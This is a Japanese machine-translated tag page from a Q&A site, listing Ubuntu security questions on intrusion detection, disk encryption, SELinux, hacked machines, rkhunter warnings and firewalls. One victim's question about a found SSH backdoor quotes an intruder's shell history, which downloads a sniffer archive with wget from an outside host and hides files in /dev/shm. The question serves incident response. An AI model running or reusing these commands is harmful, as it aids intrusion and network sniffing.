タグ付けされた質問 「security」

セキュリティは、ユーザー、権限、認証、承認、アップグレード、ファイアウォール、強化などを含む幅広いトピックのセットをカバーしています。

3
どのような自動化された侵入通知/検出セットアップがホームデスクトップの使用に適していますか?
私はかなり長い間Linuxを使っていますが、スキャンやログイン試行の失敗などの疑わしいネットワークアクティビティをその場でメールまたは視覚/音声通知。 私はログなどを調べる方法を知っていますが、ほとんどの場合それは手動の時間のかかるプロセスです。優れたログ解析機能を備えた半/完全に自動化されたものを探しています。 Snortなどのネットワークを監視するためのIDSシステムは知っていますが、それらは平均的なホームユーザーにとってはやり過ぎであり、起動するのに苦痛なプロセスです。 ホームユーザーとして私にとって良い選択肢は何ですか?


2
LUKSを介したYubikey 2要素認証フルディスク暗号化
最近、Yubikey Neoを購入しました。これは、ちょっとしたハードウェアの第2要素認証デバイスです。主にワンタイムパスワードと新しいU2Fプロトコルでの使用を目的としていますが、Yubikeyバージョン2以降では、HMAC-SHA1チャレンジ/レスポンス認証もサポートしています。HMAC-SHA1は、(Yubikey内に格納されている)秘密鍵を組み合わせ、これをパスフレーズと組み合わせて応答を生成します。 YubikeyをUbuntu FDEセットアップと組み合わせて、暗号化されたハードドライブで2FAを使用するにはどうすればよいですか?

2
SELinuxとAppArmorを同時に実行するのは悪い考えですか?
私の企業ポリシーでは、LinuxボックスはSELinuxで保護する必要があると述べています(したがって、セキュリティ監査人は各サーバーの「はい、非常に安全です!」チェックボックスをチェックできます)。Ubuntuの素晴らしいデフォルトのAppArmorセキュリティを利用したいと思っていました。ApparmorとSELinuxの両方を実行するのは賢明ではありませんか?(もしそうなら、この悪い考えはいくつかの防具やselinuxの調整で軽減できますか?)

6
ハッキングされたパーソナルコンピューター:このユーザーが再度ログインするのをブロックするにはどうすればよいですか?彼らがどのようにログインしているかを知るにはどうすればよいですか?
私のパソコンのシステムに侵入したのは99.9%です。状況が明確になるように、最初に推論を述べさせてください。 不審なアクティビティの大まかなタイムラインとその後のアクション: 4-26 23:00 すべてのプログラムを終了し、ラップトップを閉じました。 4-27 12:00 ラップトップを約13時間サスペンドモードにした後、ラップトップを開きました。次を含む複数のウィンドウが開いていました。2つのクロムウィンドウ、システム設定、ソフトウェアセンター。デスクトップにgitインストーラーがありました(チェックしましたが、インストールされていません)。 4-27 13:00 Chrome履歴には、メールへのログイン、および「gitのインストール」など、開始しなかった他の検索履歴(4-27の01:00から03:00)が表示されました。私のブラウザで、デジタルオーシャンの「bashプロンプトをカスタマイズする方法」というタブが開いていました。私はそれを閉じた後、数回再開しました。Chromeのセキュリティを強化しました。 WiFiから切断しましたが、再接続すると標準の記号ではなく上下の矢印記号が表示され、Wifiのドロップダウンメニューに [接続の編集]の下にネットワークのリストが表示されなくなりました。「GFiberSetup 1802」と呼ばれるネットワークに、4-27の〜05:30に。1802 xx Driveの隣人にはGoogle Fiberがインストールされていたので、関連していると思います。 4-27夜08時30 コマンドは、第2のユーザという名前のゲスト-g20zooは、私のシステムにログインしていたことを明らかにしました。これは、Ubuntuを実行するプライベートラップトップであり、システム上に他の人がいないはずです。パニック、私は走って、ネットワークとWifiを無効にしましたwhosudo pkill -9 -u guest-g20zoo 私は調べて/var/log/auth.logこれを見つけました: Apr 27 06:55:55 Rho useradd[23872]: new group: name=guest-g20zoo, GID=999 Apr 27 06:55:55 Rho useradd[23872]: new user: name=guest-g20zoo, UID=999, GID=999, home=/tmp/guest-g20zoo, shell=/bin/bash Apr 27 06:55:55 Rho su[23881]: …


5
sudoパスワードはどのくらい重要ですか?
sudoパスワードは、物理的にアクセスできる人によってローカルでハッキングされることからコンピューターを保護することを知っています(編集:実際にはそうではありません)。私のパスワードはその目的には十分に強力ですが、誰かがリモートでブルートフォースできる場合、それは十分に強力ではないことを知っています。 標準のUbuntuデスクトップインストールで、コンピューターに物理的にアクセスせずに、sudoパスワードを使用して、誰でもルートモードでコンピューターにアクセスできますか? ネットワークにアクセスできる場合、間違いなくはい(短い答え) セキュリティに十分な注意を払っていない場合は、はい(長い答え) 「ssh」を実行していて、2FAがない場合、はい(コメントと回答) sudo /ユーザーパスワードなしでルートとしてコンピューターにアクセスできます

6
Ubuntuのバイナリがソースコードからのものであることを確認するにはどうすればよいですか?
99%のユーザーと同様に、既製のバイナリからUbuntuをインストールします。 これらのバイナリが実際にUbuntuの元のソースコードからのものであることを確認するにはどうすればよいですか? NSA /誰かがUbuntuまたはLinode(私のVPSプロバイダー)と協力してバイナリを混乱させていないことを確認するのは良いことです。バイナリを検証できた場合、最初にそれらを呼び出すことは簡単であるため、最初にこれを試みることはほとんどありません。
25 security 

5
プレインストールまたは自動ファイアウォールはありますか?
Ubuntuには、プレインストールまたは自動ファイアウォールが付属していますか?そうでない場合、必要ですか? セキュリティに関する他のオペレーティングシステムに対するLinuxの利点に関するいくつかの記事を読んだことがありますが(アンチウイルスは必要ありません...)、確認したいと思います。

1
/etc/.java /etc/.udev /etc/.initramfsに関するrkhunter警告
Ubuntu 10.04.1 LTSを実行しています。ルートキットを確認するためにrkhunterを実行しています。 rkhunterは、次の隠しファイルとディレクトリについて不満を言っています。これらのファイルはシステム上で実際の問題ではないと思いますが、これらのファイルが正当なファイルであるかどうかを確認するにはどうすればよいですか? [07:57:45] Checking for hidden files and directories [ Warning ] [07:57:45] Warning: Hidden directory found: /etc/.java [07:57:45] Warning: Hidden directory found: /dev/.udev [07:57:45] Warning: Hidden directory found: /dev/.initramfs 更新 これらのディレクトリは/etc/rkhunter.confで特に言及されており、これはよくある質問rkhunterの質問であることを示唆しています。rkhunter.confから: # # Allow the specified hidden directories. # One directory per line (use multiple ALLOWHIDDENDIR lines). …

2
VServerでSSHバックドアが見つかりました。何をすべきか?
昨日、VServerでコマンドの履歴を確認しました。疑わしい行がいくつか見つかりました。 195 wget aridan.hol.es/sniffer.tgz 196 tar xvf sniffer.tgz 197 ls -a 198 rm -rf sniffer.tgz 199 rm -rf .sniff/ 200 cd /dev/shm 201 ls -a 202 mkdir " . " 203 ls -a 204 cd " . "/ 205 wget aridan.hol.es/sniffer.tgz 206 tar xvf ar 207 tar zxvf ar 208 …
24 ssh  security  malware 

2
メタリリースアップグレード(do-release-upgrade)は安全ですか?
do-release-upgradeUbuntuが次の春または秋のUbuntuリリースへのアップグレードを促す方法など、プロセスを理解しようとしています。 ソースを読んだ後、システムに/ etc / update-manager / meta-releaseファイルがubuntu-release-upgrader見つかりました。このファイルは、HTTP URLを使用してhttp://changelogs.ubuntu.com/meta-releaseを指すように表示されます。ここには、Warty 04.10からRaring 13.04までのさまざまなUbuntuリリースがリストされています。このファイルには、リリース、サポート状況、リリース日がリストされ、ファイルへのリンクがあります。Release これで、Releaseファイルには対応するGPG署名と、Packagesインストールされた個々のDEBバイナリのsha1sumを持つファイルのsha1sumが含まれます。最近のリリースには、これらのアップグレードスクリプトと対応するGPGシグネチャもあります。すべていいですね。 私の質問は、meta-releaseファイル自体に関するものです。HTTPS経由では提供されず、GPG署名が見つかりません。誰かがこのファイルを置き換えると、何らかの理由で私のマシンがアップグレードされる可能性があります... ...まだセキュリティテストを実施していない署名付きリリースへ? ...サポートされておらず、セキュリティの脆弱性が修正されていない古いリリースへ?


2
システムはどのように安全に保たれていますか?
マルウェアがLinuxシステムに侵入した場合、せいぜいユーザーレベルの特権を獲得し、特定のユーザーの手の届く範囲内、つまりユーザー自身のファイルを破壊することを理解しています。 しかし、マルウェアがルートレベルのアクセスを取得できないようにするにはどうすればよいでしょうか?何とかしてパスワードを内部から解読することはできませんか?
24 security 


弊社のサイトを使用することにより、あなたは弊社のクッキーポリシーおよびプライバシーポリシーを読み、理解したものとみなされます。
Licensed under cc by-sa 3.0 with attribution required.